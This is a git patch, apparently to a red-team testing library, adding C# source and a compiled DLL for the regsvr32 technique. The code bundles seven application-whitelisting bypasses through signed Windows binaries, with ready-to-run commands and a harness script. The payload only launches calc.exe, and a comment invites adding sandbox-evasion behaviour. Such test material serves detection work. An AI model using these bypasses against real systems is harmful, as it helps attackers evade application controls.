From 7fea6fc22a09feea67e2a7a43a1a482c5575d4e1 Mon Sep 17 00:00:00 2001
From: caseysmithrc <30840394+caseysmithrc@users.noreply.github.com>
Date: Mon, 3 Sep 2018 08:54:04 -0600
Subject: [PATCH] T1117 Cleanup/Fix

---
 atomics/T1117/T1117.yaml              |   6 +-
 atomics/T1117/bin/AllTheThingsx86.dll | Bin 0 -> 5632 bytes
 atomics/T1117/src/AllTheThings.cs     | 173 ++++++++++++++++++++++++++
 3 files changed, 176 insertions(+), 3 deletions(-)
 create mode 100755 atomics/T1117/bin/AllTheThingsx86.dll
 create mode 100644 atomics/T1117/src/AllTheThings.cs

diff --git a/atomics/T1117/T1117.yaml b/atomics/T1117/T1117.yaml
index 99ff938d..91948b5a 100644
--- a/atomics/T1117/T1117.yaml
+++ b/atomics/T1117/T1117.yaml
@@ -11,7 +11,7 @@ atomic_tests:
    filename:
     description: Name of the local file, include path.
     type: Path
-    default: Regsvr32.sct
+    default: C:\AtomicRedTeam\atomics\T1117\bin\Regsvr32.sct
   executor:
    name: command_prompt
    command: |
@@ -39,8 +39,8 @@ atomic_tests:
    dll_name:
     description: Name of DLL to Execute, DLL Should export DllRegisterServer
     type: Path
-    default: payload.dll
+    default: C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
   executor:
    name: command_prompt
    command: |
-    regsvr32.exe #{dll_name}
+    "IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )"
diff --git a/atomics/T1117/bin/AllTheThingsx86.dll b/atomics/T1117/bin/AllTheThingsx86.dll
new file mode 100755
index 0000000000000000000000000000000000000000..eafffbf851f4cb51e0fb072cd8b7b5ec73a1999f
GIT binary patch
literal 5632
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
QgEPlJl#Tm?{%14rPxn*X^8f$<

literal 0
HcmV?d00001

diff --git a/atomics/T1117/src/AllTheThings.cs b/atomics/T1117/src/AllTheThings.cs
new file mode 100644
index 00000000..b19e1e33
--- /dev/null
+++ b/atomics/T1117/src/AllTheThings.cs
@@ -0,0 +1,173 @@
+using System;
+using System.Diagnostics;
+using System.Reflection;
+using System.Configuration.Install;
+using System.Runtime.InteropServices;
+using System.EnterpriseServices;
+using RGiesecke.DllExport;
+using System.Windows.Forms;
+
+// You will need Visual Studio and UnmanagedExports to build this binary
+// Install-Package UnmanagedExports -Version 1.2.7
+// Project must be built with a specific architecure setting x86 /x64
+
+
+/*
+Author: Casey Smith, Twitter: @subTee
+License: BSD 3-Clause
+
+For Testing Binary Application Whitelisting Controls
+
+Includes 7 Known Application Whitelisting/ Application Control Bypass Techniques in One File.
+1. InstallUtil.exe
+2. Regsvcs.exe
+3. Regasm.exe
+4. regsvr32.exe
+5. rundll32.exe
+6. odbcconf.exe
+7. regsvr32 with params
+
+
+Usage:
+1.
+    x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
+    x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
+2.
+    x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll
+    x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll
+3.
+    x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll
+    x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll
+
+4.
+    regsvr32 /s /u AllTheThings.dll -->Calls DllUnregisterServer
+    regsvr32 /s AllTheThings.dll --> Calls DllRegisterServer
+5.
+    rundll32 AllTheThings.dll,EntryPoint
+
+6.
+    odbcconf.exe /s /a { REGSVR AllTheThings.dll }
+
+7.
+    regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThings.dll
+
+
+Sample Harness.Bat
+
+[Begin]
+C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
+C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll
+C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll
+regsvr32 /s /u AllTheThings.dll
+regsvr32 /s AllTheThings.dll
+rundll32 AllTheThings.dll,EntryPoint
+odbcconf.exe /a { REGSVR AllTheThings.dll }
+regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThings.dll
+[End]
+
+
+*/
+
+[assembly: ApplicationActivation(ActivationOption.Server)]
+[assembly: ApplicationAccessControl(false)]
+
+public class Program
+{
+    public static void Main()
+    {
+        Console.WriteLine("Hello From Main...I Don't Do Anything");
+        //Add any behaviour here to throw off sandbox execution/analysts :)
+    }
+
+}
+
+public class Thing0
+{
+    public static void Exec()
+    {
+        ProcessStartInfo startInfo = new ProcessStartInfo();
+        startInfo.FileName = "calc.exe";
+        Process.Start(startInfo);
+    }
+
+    public static void ExecParam(string a)
+    {
+        MessageBox.Show(a);
+    }
+}
+
+[System.ComponentModel.RunInstaller(true)]
+public class Thing1 : System.Configuration.Install.Installer
+{
+    //The Methods can be Uninstall/Install.  Install is transactional, and really unnecessary.
+    public override void Uninstall(System.Collections.IDictionary savedState)
+    {
+
+        Console.WriteLine("Hello There From Uninstall");
+        Thing0.Exec();
+
+    }
+
+}
+
+[ComVisible(true)]
+[Guid("31D2B969-7608-426E-9D8E-A09FC9A51680")]
+[ClassInterface(ClassInterfaceType.None)]
+[ProgId("dllguest.Bypass")]
+[Transaction(TransactionOption.Required)]
+public class Bypass : ServicedComponent
+{
+    public Bypass() { Console.WriteLine("I am a basic COM Object"); }
+
+    [ComRegisterFunction] //This executes if registration is successful
+    public static void RegisterClass(string key)
+    {
+        Console.WriteLine("I shouldn't really execute");
+        Thing0.Exec();
+    }
+
+    [ComUnregisterFunction] //This executes if registration fails
+    public static void UnRegisterClass(string key)
+    {
+        Console.WriteLine("I shouldn't really execute either.");
+        Thing0.Exec();
+    }
+
+    public void Exec() { Thing0.Exec(); }
+}
+
+class Exports
+{
+
+    //
+    //
+    //rundll32 entry point
+    [DllExport("EntryPoint", CallingConvention = CallingConvention.StdCall)]
+    public static void EntryPoint(IntPtr hwnd, IntPtr hinst, string lpszCmdLine, int nCmdShow)
+    {
+        Thing0.Exec();
+    }
+
+    [DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
+    public static bool DllRegisterServer()
+    {
+        Thing0.Exec();
+        return true;
+    }
+
+    [DllExport("DllUnregisterServer", CallingConvention = CallingConvention.StdCall)]
+    public static bool DllUnregisterServer()
+    {
+        Thing0.Exec();
+        return true;
+    }
+
+    [DllExport("DllInstall", CallingConvention = CallingConvention.StdCall)]
+    public static void DllInstall(bool bInstall, IntPtr a)
+    {
+        string b = Marshal.PtrToStringUni(a);
+        Thing0.ExecParam(b);
+    }
+
+
+}